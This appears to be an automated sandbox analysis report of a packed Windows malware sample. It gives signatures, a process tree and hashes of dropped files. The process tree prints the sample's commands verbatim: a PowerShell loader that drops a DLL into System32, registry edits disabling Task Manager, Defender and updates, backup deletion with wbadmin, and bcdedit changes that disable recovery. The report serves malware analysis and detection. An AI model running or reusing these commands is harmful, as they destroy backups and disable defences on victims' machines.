Analysis

  • max time kernel
    151s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/11/2024, 23:01

General

  • Target
    9011fee7b1e1457d74b0171ab0dd3d457c956ff25e6e577fd68f221c11043274.exe
  • Size 108.4MB
  • Sample241116-2zm18awbpe
  • SHA256 9011fee7b1e1457d74b0171ab0dd3d457c956ff25e6e577fd68f221c11043274
  • MD5 SHA1 SHA512 SSDEEP

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Modifies boot configuration data using bcdedit 1 TTPs 7 IoCs
  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Loads dropped DLL 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 64 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies registry key 1 TTPs 7 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9011fee7b1e1457d74b0171ab0dd3d457c956ff25e6e577fd68f221c11043274.exe
    "C:\Users\Admin\AppData\Local\Temp\9011fee7b1e1457d74b0171ab0dd3d457c956ff25e6e577fd68f221c11043274.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4828
    • C:\Users\Admin\AppData\Local\Temp\9011fee7b1e1457d74b0171ab0dd3d457c956ff25e6e577fd68f221c11043274.exe
      "C:\Users\Admin\AppData\Local\Temp\9011fee7b1e1457d74b0171ab0dd3d457c956ff25e6e577fd68f221c11043274.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "ver"
        3⤵
          PID:1312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command " $paths = @(\"C:\Program Files\PowerShell\7\pwsh.exe\", \"$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe\"); foreach ($path in $paths) { if (Test-Path $path) { $PSLocation = $path; break; } }; if (-not $PSLocation) { exit }; $OSVersion = (Get-ItemProperty -Path \"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\" -Name ProductName).ProductName; $supportedVersions = @(\"Windows 10 Home\", \"Windows 10 Pro\", \"Windows Server 2019 Standard\", \"Windows Server 2022 Standard\"); if ($supportedVersions -notcontains $OSVersion) { exit }; $mockFolderPath = \"C:\Windows\System32\\\"; if (-not (Test-Path $mockFolderPath)) { New-Item -Path $mockFolderPath -ItemType Directory | Out-Null }; $cmstpPath = \"$env:SystemRoot\System32\cmstp.exe\"; if (-not (Test-Path $cmstpPath)) { $sourceFolder = \"C:\cmstp\files\"; $filesToCopy = @(\"cmstp.exe\", \"cmstp.dll\", \"cmstp.inf\", \"cmstp.exe.mui\"); foreach ($file in $filesToCopy) { $sourceFile = Join-Path -Path $sourceFolder -ChildPath $file; $destinationFile = Join-Path -Path $mockFolderPath -ChildPath $file; Copy-Item -Path $sourceFile -Destination $destinationFile -Force | Out-Null; } }; [Reflection.Assembly]::LoadWithPartialName(\"System.Windows.Forms\") | Out-Null; Add-Type -TypeDefinition ([IO.File]::ReadAllText(\"$pwd\sl0puacb.cs\")) -ReferencedAssemblies \"System.Windows.Forms\" -OutputAssembly \"$mockFolderPath\sl0p.dll\"; Copy-Item \"$mockFolderPath\sl0p.dll\" -Destination \"C:\Windows\System32\sl0p.dll\" -Force | Out-Null; [Reflection.Assembly]::Load([IO.File]::ReadAllBytes(\"$mockFolderPath\sl0p.dll\")) | Out-Null; "
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f && REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f && REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f && REG add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup" /v BackupInProgress /t REG_DWORD /d 0 /f && REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f && REG add "HKLM\SOFTWARE\Policies\Microsoft\WindowsStore" /v RemoveWindowsStore /t REG_DWORD /d 1 /f && REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupIDPage /t REG_DWORD /d 1 /f && REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupSecurityPage /t REG_DWORD /d 1 /f && REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f && REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindows /t REG_DWORD /d 1 /f && powershell -Command "Disable-ComputerRestore -Drive \"C:\";Disable-ScheduledTask -TaskPath \"\Microsoft\Windows\WindowsBackup\" -TaskName \"AutomaticBackup\"; Stop-Service -Name SDRSVC; Set-Service -Name SDRSVC -StartupType Disabled""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\system32\reg.exe
            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
            4⤵
            • Modifies registry key
            PID:5008
          • C:\Windows\system32\reg.exe
            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            4⤵
            • Modifies registry key
            PID:3200
          • C:\Windows\system32\reg.exe
            REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
            4⤵
              PID:3916
            • C:\Windows\system32\reg.exe
              REG add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup" /v BackupInProgress /t REG_DWORD /d 0 /f
              4⤵
                PID:2572
              • C:\Windows\system32\reg.exe
                REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                4⤵
                  PID:3636
                • C:\Windows\system32\reg.exe
                  REG add "HKLM\SOFTWARE\Policies\Microsoft\WindowsStore" /v RemoveWindowsStore /t REG_DWORD /d 1 /f
                  4⤵
                    PID:3952
                  • C:\Windows\system32\reg.exe
                    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupIDPage /t REG_DWORD /d 1 /f
                    4⤵
                    • Modifies registry key
                    PID:2280
                  • C:\Windows\system32\reg.exe
                    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupSecurityPage /t REG_DWORD /d 1 /f
                    4⤵
                    • Modifies registry key
                    PID:3668
                  • C:\Windows\system32\reg.exe
                    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
                    4⤵
                    • Modifies registry key
                    PID:4204
                  • C:\Windows\system32\reg.exe
                    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindows /t REG_DWORD /d 1 /f
                    4⤵
                    • Modifies registry key
                    PID:3180
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Disable-ComputerRestore -Drive \"C:\";Disable-ScheduledTask -TaskPath \"\Microsoft\Windows\WindowsBackup\" -TaskName \"AutomaticBackup\"; Stop-Service -Name SDRSVC; Set-Service -Name SDRSVC -StartupType Disabled"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2928
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "REG add HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /f"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3656
                  • C:\Windows\system32\reg.exe
                    REG add HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /f
                    4⤵
                    • Modifies registry key
                    PID:4736
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "reagentc.exe /disable"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3116
                  • C:\Windows\system32\ReAgentc.exe
                    reagentc.exe /disable
                    4⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:4576
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "bcdedit /set {default} safeboot minimal"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1492
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} safeboot minimal
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1976
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "bcdedit /deletevalue {default} safeboot"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5080
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /deletevalue {default} safeboot
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:4796
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "bcdedit /set {bootmgr} bootstatuspolicy ignoreallfailures"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4660
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {bootmgr} bootstatuspolicy ignoreallfailures
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:792
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wbadmin delete backup -delete_all -backupTarget:C: -quiet"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1568
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete backup -delete_all -backupTarget:C: -quiet
                    4⤵
                    • Deletes system backups
                    • Drops file in Windows directory
                    PID:836
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "sc config wbengine start= disabled"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3896
                  • C:\Windows\system32\sc.exe
                    sc config wbengine start= disabled
                    4⤵
                    • Launches sc.exe
                    PID:1644
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "net stop wbengine"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3088
                  • C:\Windows\system32\net.exe
                    net stop wbengine
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4700
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop wbengine
                      5⤵
                        PID:5020
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "sc config wuauserv start= disabled"
                    3⤵
                      PID:1488
                      • C:\Windows\system32\sc.exe
                        sc config wuauserv start= disabled
                        4⤵
                        • Launches sc.exe
                        PID:4604
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "net stop wuauserv"
                      3⤵
                        PID:1724
                        • C:\Windows\system32\net.exe
                          net stop wuauserv
                          4⤵
                            PID:2284
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              5⤵
                                PID:4116
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "sc config wscsvc start= disabled"
                            3⤵
                              PID:2572
                              • C:\Windows\system32\sc.exe
                                sc config wscsvc start= disabled
                                4⤵
                                • Launches sc.exe
                                PID:2912
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "wmic /Namespace:\\root\default Path SystemRestore Call Disable"
                              3⤵
                                PID:3652
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic /Namespace:\\root\default Path SystemRestore Call Disable
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1656
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "bcdedit /set {default} recoveryenabled No"
                                3⤵
                                  PID:1744
                                  • C:\Windows\system32\bcdedit.exe
                                    bcdedit /set {default} recoveryenabled No
                                    4⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:1148
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "bcdedit.exe /set {globalsettings} advancedoptions false"
                                  3⤵
                                    PID:3396
                                    • C:\Windows\system32\bcdedit.exe
                                      bcdedit.exe /set {globalsettings} advancedoptions false
                                      4⤵
                                      • Modifies boot configuration data using bcdedit
                                      PID:1616
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "bcdedit.exe /set {globalsettings} optionsedit false"
                                    3⤵
                                      PID:504
                                      • C:\Windows\system32\bcdedit.exe
                                        bcdedit.exe /set {globalsettings} optionsedit false
                                        4⤵
                                        • Modifies boot configuration data using bcdedit
                                        PID:4664
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "bcdedit.exe /set {bootmgr} noerrordisplay on"
                                      3⤵
                                        PID:4340
                                        • C:\Windows\system32\bcdedit.exe
                                          bcdedit.exe /set {bootmgr} noerrordisplay on
                                          4⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:2236
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecureBoot\State" /v UEFISecureBootEnabled /t REG_DWORD /d 0 /f"
                                        3⤵
                                          PID:2628
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecureBoot\State" /v UEFISecureBootEnabled /t REG_DWORD /d 0 /f
                                            4⤵
                                              PID:1916

                                      Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            VCRUNTIME140.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\VCRUNTIME140.dll
                                            • Size 106KB
                                            • SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
                                            • MD5 SHA1 SHA512 SSDEEP

                                            _bz2.pyd

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\_bz2.pyd
                                            • Size 82KB
                                            • SHA256 ebcac51449f323ae3ae961a33843029c34b6a82138ccd9214cf99f98dd2148c2
                                            • MD5 SHA1 SHA512 SSDEEP

                                            _ctypes.pyd

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\_ctypes.pyd
                                            • Size 120KB
                                            • SHA256 b1214d7b7efd9d4b0f465ec3463512a1cbc5f59686267030f072e6ce4b2a95cf
                                            • MD5 SHA1 SHA512 SSDEEP

                                            _lzma.pyd

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\_lzma.pyd
                                            • Size 155KB
                                            • SHA256 f74aaf0aa08cf90eb1eb23a474ccb7cb706b1ede7f911daf7ae68480765bdf11
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-console-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-console-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-datetime-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-datetime-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-debug-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-debug-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-errorhandling-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-errorhandling-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-file-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-file-l1-1-0.dll
                                            • Size 25KB
                                            • SHA256 3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-file-l1-2-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-file-l1-2-0.dll
                                            • Size 21KB
                                            • SHA256 ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-file-l2-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-file-l2-1-0.dll
                                            • Size 18KB
                                            • SHA256 1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-handle-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-handle-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-heap-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-heap-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-interlocked-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-interlocked-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-libraryloader-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-libraryloader-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-localization-l1-2-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-localization-l1-2-0.dll
                                            • Size 21KB
                                            • SHA256 4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-memory-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-memory-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-namedpipe-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-namedpipe-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 5476db3a4fecf532f96d48f9802c966fdef98ec8d89978a79540cb4db352c15f
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-processenvironment-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-processenvironment-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 0b6b598ec28a9e3d646f2bb37e1a57a3dda069a55fba86333727719585b1886e
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-processthreads-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-processthreads-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 be8d78978d81555554786e08ce474f6af1de96fcb7fa2f1ce4052bc80c6b2125
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-processthreads-l1-1-1.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-processthreads-l1-1-1.dll
                                            • Size 21KB
                                            • SHA256 57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-profile-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-profile-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 e1c5d8984a674925fa4afbfe58228be5323fe5123abcd17ec4160295875a625f
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-rtlsupport-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-rtlsupport-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 3c29730df2b28985a30d9c82092a1faa0ceb7ffc1bd857d1ef6324cf5524802f
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-string-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-string-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 27e9d3e7c8756e4512932d674a738bf4c2969f834d65b2b79c342a22f662f328
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-synch-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-synch-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 61c0ebe60ce6ebabcb927ddff837a9bf17e14cd4b4c762ab709e630576ec7232
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-synch-l1-2-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-synch-l1-2-0.dll
                                            • Size 21KB
                                            • SHA256 433bd8ddc4f79aee65ca94a54286d75e7d92b019853a883e51c2b938d2469baa
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-sysinfo-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-sysinfo-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 0dc92e8830bc84337dcae19ef03a84ef5279cf7d4fdc2442c1bc25320369f9df
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-timezone-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-timezone-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-core-util-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-core-util-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 2e1f090aba941b9d2d503e4cd735c958df7bb68f1e9bdc3f47692e1571aaac2f
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-conio-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-conio-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 93619259328a264287aee7c5b88f7f0ee32425d7323ce5dc5a2ef4fe3bed90d5
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-convert-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-convert-l1-1-0.dll
                                            • Size 25KB
                                            • SHA256 b987ab40cdd950ebe7a9a9176b80b8fffc005ccd370bb1cbbcad078c1a506bdc
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-environment-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-environment-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 2f6bd6c235e044755d5707bd560a6afc0ba712437530f76d11079d67c0cf3200
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-filesystem-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-filesystem-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 94a86e28e829276974e01f8a15787fde6ed699c8b9dc26f16a51765c86c3eade
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-heap-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-heap-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 8dd9218998b4c4c9e8d8b0f8b9611d49419b3c80daa2f437cbf15bcfd4c0b3b8
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-locale-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-locale-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 551a34c400522957063a2d71fa5aba1cd78cc4f61f0ace1cd42cc72118c500c0
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-math-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-math-l1-1-0.dll
                                            • Size 29KB
                                            • SHA256 1c4a70a73096b64b536be8132ed402bcfb182c01b8a451bff452efe36ddf76e7
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-multibyte-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-multibyte-l1-1-0.dll
                                            • Size 29KB
                                            • SHA256 3a4b66e65a5ee311afc37157a8101aba6017ff7a4355b4dd6e6c71d5b7223560
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-private-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-private-l1-1-0.dll
                                            • Size 73KB
                                            • SHA256 8b19bcb4918b346a8ba5e19d91823e5842314e928dbb86de8758d0dbb2b94bb4
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-process-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-process-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 bd943767f3e0568e19fb52522217c22b6627b66a3b71cd38dd6653b50662f39d
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-runtime-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-runtime-l1-1-0.dll
                                            • Size 25KB
                                            • SHA256 962d725d089f140482ee9a8ff57f440a513387dd03fdc06b3a28562c8090c0bc
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-stdio-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-stdio-l1-1-0.dll
                                            • Size 25KB
                                            • SHA256 273817a137ee049cbd8e51dc0bb1c7987df7e3bf4968940ee35376f87ef2ef8d
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-string-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-string-l1-1-0.dll
                                            • Size 25KB
                                            • SHA256 415025dce5a086dbffc4cf322e8ead55cb45f6d946801f6f5193df044db2f004
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-time-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-time-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 82fba9bc21f77309a649edc8e6fc1900f37e3ffcb45cd61e65e23840c505b945
                                            • MD5 SHA1 SHA512 SSDEEP

                                            api-ms-win-crt-utility-l1-1-0.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\api-ms-win-crt-utility-l1-1-0.dll
                                            • Size 21KB
                                            • SHA256 2e554d9bf872a64d2cd0f0eb9d5a06dea78548bc0c7a6f76e0a0c8c069f3c0a9
                                            • MD5 SHA1 SHA512 SSDEEP

                                            base_library.zip

